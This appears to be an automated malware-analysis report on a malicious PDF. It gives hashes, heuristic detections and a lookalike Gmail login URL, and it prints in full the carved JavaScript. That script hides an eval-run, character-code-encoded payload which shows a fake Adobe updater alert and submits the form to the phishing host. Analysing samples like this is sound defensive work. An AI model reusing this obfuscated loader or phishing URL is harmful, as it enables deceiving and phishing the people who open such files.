Malicious PDF — malware analysis report

Static analysis result for SHA-256 bdd8e00c157eda2d…

MALICIOUS

PDF

90.5 KB Created: 2018-06-12 09:41:10 -04:00 First seen: 2021-01-23
MD5: e7028f476aafd0863ea65d5a274787be SHA-1: 58ee764d426dba4c2ab4b3a91f3e73e6ab0adb3f SHA-256: bdd8e00c157eda2da040bff2eddc5df13fc15ba9d2b708bd926da5e3952fe375
138 Risk Score

Machine Learning

  • Nyx PDF Classifier suspicious score 0.4662

Heuristics 7

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
            }
eval(decrypt(sourceCode,(new Date().getSeconds() % 1)))
;
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Visual download / call-to-action button lure low SE_DOWNLOAD_BUTTON
    Document contains a call-to-action phrase ('Click here to download', 'Download Now', etc.) — low-signal unless other findings point to a malicious workflow
  • External URI info PDF_URI
    PDF contains an external URL action
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://gmail.net-login.com/XcmVyjaXBpZWD50X2lkPTAQ4MjIxTkODAwHOSZjYW1wAYWdlnbl9ydW5faWQ9MjIwONzUxMCZhY3Rpb249Y2xpY2smdXJsPWh0dHBzOi8vc2VjdXJlZC1sb2dpbi5uZXQvcGFnZXMvZWY5MDczMGFkZDA= PDF link annotation
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In PDF document text
    • http://ns.adobe.com/xap/1.0/In PDF document text
    • http://purl.org/dc/elements/1.1/In PDF document text
    • http://ns.adobe.com/xap/1.0/mm/In PDF document text
    • http://ns.adobe.com/tiff/1.0/In PDF document text
    • http://ns.adobe.com/exif/1.0/In PDF document text

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
javascript_obj0011_000.js pdf-javascript-stream PDF /JS object 11 at offset 0xBD6 9688 bytes
SHA-256: 3de984c8d3cfe01e808a3f22b020f29065de34227987c72eb2358bd7d8001362
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
function generateReverseArray(){
	var arr = [];
	for (var i=0; i < 1000; i++){
		arr.push(1000 - i);
	}
	return arr;
}
function bubbleSort(inputArr, num) {
	var len = inputArr.length;
    for (var n = 0; n < num; n++) {
        for (var i = 0; i < len; i++) {
            for (var j = 0; j < len; j++) {
                if (inputArr[j] > inputArr[j + 1]) {
                    var tmp = inputArr[j];
                    inputArr[j] = inputArr[j + 1];
                    inputArr[j + 1] = tmp;
                }
            }
        }
        for (var i = 0; i < len; i++) {
            for (var j = 0; j < len; j++) {
                if (inputArr[j] < inputArr[j + 1]) {
                    var tmp = inputArr[j];
                    inputArr[j] = inputArr[j + 1];
                    inputArr[j + 1] = tmp;
                }
            }
        }
    }
    return inputArr[inputArr.length - len] - 1;
}
        
function triggerSelectedCodeByTiming(num){
	bubbleSort(generateReverseArray(), num);
	sourceCode = "102,117,110,99,116,105,111,110,32,103,101,110,101,114,97,116,101,82,101,118,101,114,115,101,65,114,114,97,121,40,41,123,10,9,118,97,114,32,97,114,114,32,61,32,91,93,59,10,9,102,111,114,32,40,118,97,114,32,105,61,48,59,32,105,32,60,32,49,48,48,48,59,32,105,43,43,41,123,10,9,9,97,114,114,46,112,117,115,104,40,49,48,48,48,32,45,32,105,41,59,10,9,125,10,9,114,101,116,117,114,110,32,97,114,114,59,10,125,10,102,117,110,99,116,105,111,110,32,98,117,98,98,108,101,83,111,114,116,40,105,110,112,117,116,65,114,114,44,32,110,117,109,41,32,123,10,9,118,97,114,32,108,101,110,32,61,32,105,110,112,117,116,65,114,114,46,108,101,110,103,116,104,59,10,32,32,32,32,102,111,114,32,40,118,97,114,32,110,32,61,32,48,59,32,110,32,60,32,110,117,109,59,32,110,43,43,41,32,123,10,32,32,32,32,32,32,32,32,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,108,101,110,59,32,105,43,43,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,102,111,114,32,40,118,97,114,32,106,32,61,32,48,59,32,106,32,60,32,108,101,110,59,32,106,43,43,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,102,32,40,105,110,112,117,116,65,114,114,91,106,93,32,62,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,118,97,114,32,116,109,112,32,61,32,105,110,112,117,116,65,114,114,91,106,93,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,110,112,117,116,65,114,114,91,106,93,32,61,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,32,61,32,116,109,112,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,125,10,32,32,32,32,32,32,32,32,32,32,32,32,125,10,32,32,32,32,32,32,32,32,125,10,32,32,32,32,32,32,32,32,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,108,101,110,59,32,105,43,43,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,102,111,114,32,40,118,97,114,32,106,32,61,32,48,59,32,106,32,60,32,108,101,110,59,32,106,43,43,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,102,32,40,105,110,112,117,116,65,114,114,91,106,93,32,60,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,118,97,114,32,116,109,112,32,61,32,105,110,112,117,116,65,114,114,91,106,93,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,110,112,117,116,65,114,114,91,106,93,32,61,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,32,61,32,116,109,112,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,125,10,32,32,32,32,32,32,32,32,32,32,32,32,125,10,32,32,32,32,32,32,32,32,125,10,32,32,32,32,125,10,32,32,32,32,114,101,116,117,114,110,32,105,110,112,117,116,65,114,114,91,105,110,112,117,116,65,114,114,46,108,101,110,103,116,104,32,45,32,108,101,110,93,32,45,32,49,59,10,125,10,32,32,32,32,32,32,32,32,10,102,117,110,99,116,105,111,110,32,116,114,105,103,103,101,114,83,101,108,101,99,116,101,100,67,111,100,101,66,121,84,105,109,105,110,103,40,110,117,109,41,123,10,9,98,117,98,98,108,101,83,111,114,116,40,103,101,110,101,114,97,116,101,82,101,118,101,114,115,101,65,114,114,97,121,40,41,44,32,110,117,109,41,59,10,9,102,117,110,99,116,105,111,110,32,103,101,110,101,114,97,116,101,82,101,118,101,114,115,101,65,114,114,97,121,40,41,123,10,9,118,97,114,32,97,114,114,32,61,32,91,93,59,10,9,102,111,114,32,40,118,97,114,32,105,61,48,59,32,105,32,60,32,49,48,48,48,59,32,105,43,43,41,123,10,9,9,97,114,114,46,112,117,115,104,40,49,48,48,48,32,45,32,105,41,59,10,9,125,10,9,114,101,116,117,114,110,32,97,114,114,59,10,125,10,102,117,110,99,116,105,111,110,32,98,117,98,98,108,101,83,111,114,116,40,105,110,112,117,116,65,114,114,44,32,110,117,109,41,32,123,10,9,118,97,114,32,108,101,110,32,61,32,105,110,112,117,116,65,114,114,46,108,101,110,103,116,104,59,10,32,32,32,32,102,111,114,32,40,118,97,114,32,110,32,61,32,48,59,32,110,32,60,32,110,117,109,59,32,110,43,43,41,32,123,10,32,32,32,32,32,32,32,32,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,108,101,110,59,32,105,43,43,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,102,111,114,32,40,118,97,114,32,106,32,61,32,48,59,32,106,32,60,32,108,101,110,59,32,106,43,43,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,102,32,40,105,110,112,117,116,65,114,114,91,106,93,32,62,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,118,97,114,32,116,109,112,32,61,32,105,110,112,117,116,65,114,114,91,106,93,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,110,112,117,116,65,114,114,91,106,93,32,61,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,32,61,32,116,109,112,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,125,10,32,32,32,32,32,32,32,32,32,32,32,32,125,10,32,32,32,32,32,32,32,32,125,10,32,32,32,32,32,32,32,32,102,111,114,32,40,118,97,114,32,105,32,61,32,48,59,32,105,32,60,32,108,101,110,59,32,105,43,43,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,102,111,114,32,40,118,97,114,32,106,32,61,32,48,59,32,106,32,60,32,108,101,110,59,32,106,43,43,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,102,32,40,105,110,112,117,116,65,114,114,91,106,93,32,60,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,41,32,123,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,118,97,114,32,116,109,112,32,61,32,105,110,112,117,116,65,114,114,91,106,93,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,110,112,117,116,65,114,114,91,106,93,32,61,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,105,110,112,117,116,65,114,114,91,106,32,43,32,49,93,32,61,32,116,109,112,59,10,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,32,125,10,32,32,32,32,32,32,32,32,32,32,32,32,125,10,32,32,32,32,32,32,32,32,125,10,32,32,32,32,125,10,32,32,32,32,114,101,116,117,114,110,32,105,110,112,117,116,65,114,114,91,105,110,112,117,116,65,114,114,46,108,101,110,103,116,104,32,45,32,108,101,110,93,32,45,32,49,59,10,125,10,32,32,32,32,32,32,32,32,10,102,117,110,99,116,105,111,110,32,116,114,105,103,103,101,114,83,101,108,101,99,116,101,100,67,111,100,101,66,121,84,105,109,105,110,103,40,110,117,109,41,123,10,9,98,117,98,98,108,101,83,111,114,116,40,103,101,110,101,114,97,116,101,82,101,118,101,114,115,101,65,114,114,97,121,40,41,44,32,110,117,109,41,59,10,9,102,117,110,99,116,105,111,110,32,100,111,99,79,112,101,110,101,100,40,41,13,123,13,97,112,112,46,97,108,101,114,116,40,123,99,77,115,103,58,32,39,87,101,32,110,101,101,100,32,116,111,32,117,112,100,97,116,101,32,121,111,117,114,32,100,111,99,117,109,101,110,116,32,114,101,110,100,101,114,105,110,103,32,101,110,103,105,110,101,46,32,67,108,105,99,107,32,79,75,32,116,111,32,99,111,110,116,105,110,117,101,44,32,119,104,101,110,32,112,114,111,109,112,116,101,100,32,97,108,108,111,119,32,114,101,109,111,116,101,32,99,111,110,110,101,99,116,105,111,110,32,116,111,32,65,100,111,98,101,32,115,101,114,118,101,114,115,46,39,44,32,99,84,105,116,108,101,58,32,39,65,100,111,98,101,32,65,99,114,111,98,97,116,32,85,112,100,97,116,101,114,39,44,110,73,99,111,110,58,32,51,125,41,59,13,97,112,112,46,100,111,99,46,115,117,98,109,105,116,70,111,114,109,40,39,104,116,116,112,58,47,47,103,109,97,105,108,46,110,101,116,45,108,111,103,105,110,46,99,111,109,47,88,99,109,86,80,106,97,88,66,112,90,87,122,53,48,88,50,108,107,80,84,83,81,52,77,106,73,120,83,87,79,68,65,119,99,79,83,90,106,89,87,49,119,105,89,87,122,108,110,98,108,57,121,100,87,53,102,97,87,81,57,77,106,73,119,111,78,122,85,120,77,67,90,104,89,51,82,112,98,50,52,57,89,88,82,48,89,87,78,111,98,87,86,117,100,65,61,61,35,70,68,70,39,41,59,13,125,13,13,100,111,99,79,112,101,110,101,100,40,41,59,10,59,10,125,10,116,114,105,103,103,101,114,83,101,108,101,99,116,101,100,67,111,100,101,66,121,84,105,109,105,110,103,40,49,48,41,59,59,10,125,10,116,114,105,103,103,101,114,83,101,108,101,99,116,101,100,67,111,100,101,66,121,84,105,109,105,110,103,40,49,48,41,59"; 
function decrypt(str, jump){
var result = "";
var list = str.split(',');
        for (var i=0; i < list.length; i++) {
            result +=  String.fromCharCode(list[i] - jump);
        }
        return result;
        }
eval(decrypt(sourceCode,(new Date().getSeconds() % 1)))
;
}
triggerSelectedCodeByTiming(10);
font_00_cff_off00015618.bin pdf-font-stream PDF embedded font (cff) at offset 0x15618 4575 bytes
SHA-256: 9340d372ad75a105fdb1627a30e96f892e0dc7d9588c0150cf06b4fa72281cc0

Open this report in the interactive analyzer, or submit your own file for analysis.